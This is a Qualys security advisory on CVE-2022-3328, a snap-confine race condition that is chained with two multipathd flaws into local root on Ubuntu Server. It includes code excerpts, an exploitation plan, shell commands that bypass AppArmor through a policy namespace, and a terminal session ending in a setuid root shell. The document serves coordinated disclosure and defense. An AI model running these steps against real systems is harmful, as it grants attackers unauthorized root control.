Qualys Security Advisory  
Race condition in snap-confine's must_mkdir_and_open_with_perms()  
I can't help but feel a missed opportunity to integrate lyrics from  
one of the best songs ever: [SNAP! - The Power (Official Video)]  
We discovered a race condition (CVE-2022-3328) in snap-confine, a  
SUID-root program installed by default on Ubuntu. In this advisory, we  
tell the story of this vulnerability (which was introduced in February  
2022 by the patch for CVE-2021-44731) and detail how we exploited it in  
Ubuntu Server (a local privilege escalation, from any user to root) by  
combining it with two vulnerabilities in multipathd (an authorization  
bypass and a symlink attack, CVE-2022-41974 and CVE-2022-41973):  
Like the crack of the whip, I Snap! attack  
Radical mind, day and night all the time  
-- SNAP! - The Power  
In February 2022, we published CVE-2021-44731 in our "Lemmings" advisory  
to set up a snap's sandbox, snap-confine created the temporary directory  
/tmp/snap.$SNAP_NAME or reused it if it already existed, even if it did  
not belong to root; a local attacker could race against snap-confine,  
retain control over /tmp/snap.$SNAP_NAME, and eventually obtain full  
root privileges.  
This vulnerability was patched by commit acb2b4c ("cmd/snap-confine:  
Prevent user-controlled race in setup_private_mount"), which introduced  
a new helper function, must_mkdir_and_open_with_perms():  
142 static void setup_private_mount(const char *snap_name)  
169 sc_must_snprintf(base_dir, sizeof(base_dir), "/tmp/snap.%s", snap_name);  
176 base_dir_fd = must_mkdir_and_open_with_perms(base_dir, 0, 0, 0700);  
55 static int must_mkdir_and_open_with_perms(const char *dir, uid_t uid, gid_t gid,  
56 mode_t mode)  
61 mkdir:  
67 if (mkdir(dir, 0700) < 0 && errno != EEXIST) {  
70 fd = open(dir, O_RDONLY | O_DIRECTORY | O_CLOEXEC | O_NOFOLLOW);  
81 if (fstat(fd, &st) < 0) {  
84 if (st.st_uid != uid || st.st_gid != gid  
85 || st.st_mode != (S_IFDIR | mode)) {  
130 if (rename(dir, random_dir) < 0) {  
135 goto mkdir;  
- the temporary directory /tmp/snap.$SNAP_NAME is created at line 67, if  
it does not exist already;  
- if it already exists, and if it does not belong to root (at line 84),  
then it is moved out of the way (at line 130) by rename()ing it to a  
random directory in /tmp, and its creation is retried (at line 135).  
When we reviewed this patch back in December 2021, we felt very nervous  
about this rename() call (because it allows a local attacker to rename()  
a directory they do not own), and we advised the Ubuntu Security Team to  
either not reuse the directory /tmp/snap.$SNAP_NAME at all, or to create  
it in a non-world-writable directory instead of /tmp, or at least to use  
renameat2(RENAME_EXCHANGE) instead of rename(). Unfortunately, all of  
these ideas were deemed impractical (for example, renameat2() is not  
supported by older kernel and glibc versions); moreover, we (Qualys)  
failed to come up with a feasible attack plan against this rename()  
call, so the patch was kept in its current form.  
After the release of Ubuntu 22.04 in April 2022, we decided to revisit  
snap-confine and its recent hardening changes, and we finally found a  
way to exploit the rename() call in must_mkdir_and_open_with_perms().  
It's getting, it's getting, it's getting kinda heavy  
It's getting, it's getting, it's getting kinda hectic  
-- SNAP! - The Power  
The three key ideas to exploit the rename() of /tmp/snap.$SNAP_NAME are:  
1/ snap-confine operates in /tmp to create a snap's temporary directory  
(/tmp/snap.$SNAP_NAME in setup_private_mount()), but it also operates in  
/tmp to create the snap's *root* directory (/tmp/snap.rootfs_XXXXXX in  
sc_bootstrap_mount_namespace(), where all of the Xs are randomized by  
mkdtemp()), and the string rootfs_XXXXXX is accepted as a valid snap  
instance name by sc_instance_name_validate() (when all of the Xs are  
lowercase alphanumeric):  
286 static void sc_bootstrap_mount_namespace(const struct sc_mount_config *config)  
288 char scratch_dir[] = "/tmp/snap.rootfs_XXXXXX";  
291 if (mkdtemp(scratch_dir) == NULL) {  
303 sc_do_mount(scratch_dir, scratch_dir, NULL, MS_BIND, NULL);  
319 sc_do_mount(config->rootfs_dir, scratch_dir, NULL, MS_REC | MS_BIND,  
331 for (const struct sc_mount * mnt = config->mounts; mnt->path != NULL;  
342 sc_must_snprintf(dst, sizeof dst, "%s/%s", scratch_dir,  
343 mnt->path);  
352 sc_do_mount(mnt->path, dst, NULL, MS_REC | MS_BIND,  
2/ We therefore execute two instances of snap-confine in parallel:  
- we block the first snap-confine immediately after it creates its root  
directory /tmp/snap.rootfs_XXXXXX at line 291 (we reliably win this  
race condition by "single-stepping" snap-confine, as explained in our  
"Lemmings" advisory);  
- we execute the second snap-confine with a snap instance name of  
rootfs_XXXXXX -- i.e., the temporary directory /tmp/snap.$SNAP_NAME of  
this second snap-confine is the root directory /tmp/snap.rootfs_XXXXXX  
of the first snap-confine;  
- we kill this second snap-confine immediately after it rename()s its  
temporary directory /tmp/snap.$SNAP_NAME -- i.e., the root directory  
/tmp/snap.rootfs_XXXXXX of the first snap-confine -- at line 130 (we  
reliably win this race condition with inotify, as explained in our  
"Lemmings" advisory);  
- we re-create the directory /tmp/snap.rootfs_XXXXXX ourselves, and  
resume the execution of the first snap-confine, whose root directory  
now belongs to us.  
3/ We can therefore create an arbitrary symlink  
/tmp/snap.rootfs_XXXXXX/tmp, and sc_bootstrap_mount_namespace() will  
bind-mount the real /tmp directory (which is world-writable) onto any  
directory in the filesystem (because mount() will follow our arbitrary  
symlink at line 352).  
This ability will eventually allow us to obtain full root privileges,  
but we must first solve three problems:  
Problem a/ We cannot trick snap-confine into rename()ing  
/tmp/snap.rootfs_XXXXXX, because this directory belongs to root and  
must_mkdir_and_open_with_perms() rename()s it only if it does not belong  
to root!  
This problem solves itself naturally: indeed, /tmp/snap.rootfs_XXXXXX  
belongs to the user root, but it belongs to the group of our own user,  
so must_mkdir_and_open_with_perms() rename()s it because it does not  
belong to the group root (at line 84).  
Problem b/ We cannot trick snap-confine into following our symlink  
/tmp/snap.rootfs_XXXXXX/tmp, because sc_bootstrap_mount_namespace()  
bind-mounts a read-only squashfs onto /tmp/snap.rootfs_XXXXXX (at line  
319): if we create our symlink before this bind-mount, then it becomes  
covered by the squashfs; and we cannot create our symlink after this  
bind-mount, because the squashfs is read-only and belongs to root!  
The "Prologue: CVE-2021-3996 and CVE-2021-3995 in util-linux's libmount"  
of our "Lemmings" advisory suggests a solution to this problem: we must  
unmount /tmp/snap.rootfs_XXXXXX each time sc_bootstrap_mount_namespace()  
bind-mounts it (at lines 303 and 319). The "(deleted)" technique we used  
in "Lemmings" (CVE-2021-3996 in util-linux) was patched in January 2022,  
but we found a surprisingly simple workaround:  
we mount a FUSE filesystem onto /tmp/snap.rootfs_XXXXXX, immediately  
after we re-create this directory ourselves; this allows us to unmount  
(with fusermount -u -z) any subsequent bind-mounts (even if they belong  
to root), because fusermount does not check that our FUSE filesystem is  
indeed the most recently mounted filesystem on /tmp/snap.rootfs_XXXXXX.  
Problem c/ We cannot trick snap-confine into bind-mounting the real /tmp  
onto an arbitrary directory in the filesystem (at line 352), because  
such a bind-mount is forbidden by snap-confine's AppArmor profile!  
To solve this problem, we must bypass AppArmor completely, but the  
technique we used in our "Lemmings" advisory (we wrapped snap-confine's  
execution in an AppArmor profile that was in "complain" mode, not in  
"enforce" mode) was patched in February 2022 (by commits 26eed65 and  
4a2eb78, "ensure that snap-confine is in strict confinement" and  
"Tighten AppArmor label check"):  
now, snap-confine's execution must be wrapped in an AppArmor profile  
that is in "enforce" mode and whose label matches the regular expression  
We were about to give up on trying to exploit snap-confine, when we  
discovered CVE-2022-41974 and CVE-2022-41973 in multipathd (which is  
installed by default on Ubuntu Server): these two vulnerabilities allow  
us to create a directory named "failed_wwids" (user root, group root,  
mode 0700) anywhere in the filesystem, and we were able to transform  
this very limited directory creation into a complete AppArmor bypass.  
AppArmor supports policy namespaces that are loosely related to kernel  
user namespaces; by default, no AppArmor namespaces exist:  
$ ls -la /sys/kernel/security/apparmor/policy/namespaces  
total 0  
drwxr-xr-x 2 root root 0 Aug 6 12:42 .  
drwxr-xr-x 5 root root 0 Aug 6 12:42 ..  
However, we (attackers) can create an AppArmor namespace "failed_wwids"  
by exploiting CVE-2022-41974 and CVE-2022-41973 in multipathd:  
$ ln -s /sys/kernel/security/apparmor/policy/namespaces /dev/shm/multipath  
$ multipathd list devices | grep 'whitelisted, unmonitored'  
sda1 devnode whitelisted, unmonitored  
$ multipathd list list path sda1  
$ ls -la /sys/kernel/security/apparmor/policy/namespaces  
total 0  
drwxr-xr-x 3 root root 0 Aug 6 12:42 .  
drwxr-xr-x 5 root root 0 Aug 6 12:42 ..  
drwx------ 5 root root 0 Aug 6 13:38 failed_wwids  
Then, we can enter this AppArmor namespace by creating and entering an  
unprivileged user namespace:  
$ aa-exec -n failed_wwids -p unconfined -- unshare -U -r /bin/sh  
Inside this namespace, we can create an AppArmor profile labeled  
"/usr/lib/snapd/snap-confine" that is in "enforce" mode and allows all  
possible operations:  
# apparmor_parser -K -a << "EOF"  
/usr/lib/snapd/snap-confine (enforce) {  
Back in the initial namespace, we check that our "allow all" AppArmor  
profile still exists:  
# aa-status  
apparmor module is loaded.  
32 profiles are loaded.  
32 profiles are in enforce mode.  
Last, we make sure that snap-confine accepts our "allow all" AppArmor  
profile (i.e., AppArmor is bypassed, and snap-confine is effectively  
$ env -i SNAPD_DEBUG=1 SNAP_INSTANCE_NAME=lxd aa-exec -n failed_wwids -p /usr/lib/snapd/snap-confine -- /usr/lib/snapd/snap-confine --base lxd snap.lxd.daemon /nonexistent  
DEBUG: apparmor label on snap-confine is: /usr/lib/snapd/snap-confine  
DEBUG: apparmor mode is: enforce  
We can therefore bind-mount /tmp onto an arbitrary directory in the  
filesystem (by exploiting CVE-2022-3328); since we already depend on  
multipathd to bypass AppArmor, we bind-mount /tmp onto /lib/multipath,  
create our own shared library /lib/multipath/, shutdown  
multipathd (by exploiting CVE-2022-41974), restart multipathd (through  
its Unix socket), and finally obtain full root privileges (because  
multipathd executes our shared library as root when it restarts):  
$ grep multipath /proc/self/mountinfo | wc  
0 0 0  
$ gcc -o CVE-2022-3328 CVE-2022-3328.c  
$ ./CVE-2022-3328  
scratch directory for constructing namespace: /tmp/snap.rootfs_0j4u9c  
$ grep multipath /proc/self/mountinfo  
1395 29 253:0 /tmp /usr/lib/multipath rw,relatime shared:1 - ext4 /dev/mapper/ubuntu--vg-ubuntu--lv rw  
$ gcc -fpic -shared -o /lib/multipath/ libtmpsh.c  
$ ps -ef | grep 'multipath[d]'  
root 371 1 0 12:42 ? 00:00:00 /sbin/multipathd -d -s  
$ multipathd list list add del switch sus resu rei fai resi rese rel forc dis rest paths maps path P map P gro P rec dae statu stats top con bla dev raw wil quit  
$ ps -ef | grep 'multipath[d]' | wc  
0 0 0  
$ ls -l /tmp/sh  
ls: cannot access '/tmp/sh': No such file or directory  
$ multipathd list daemon  
error -104 receiving packet  
$ ls -l /tmp/sh  
-rwsr-xr-x 1 root root 125688 Aug 6 14:55 /tmp/sh  
$ /tmp/sh -p  
# id  
uid=65534(nobody) gid=65534(nogroup) euid=0(root) groups=65534(nogroup)  
We thank the Ubuntu security team (Alex Murray and Seth Arnold in  
particular) and the snapd team for their hard work on this snap-confine  
vulnerability. We also thank the members of linux-distros@openwall.  
2022-08-23: Contacted security@ubuntu.  
2022-11-28: Contacted linux-distros@openwall.  
2022-11-30: Coordinated Release Date (17:00 UTC).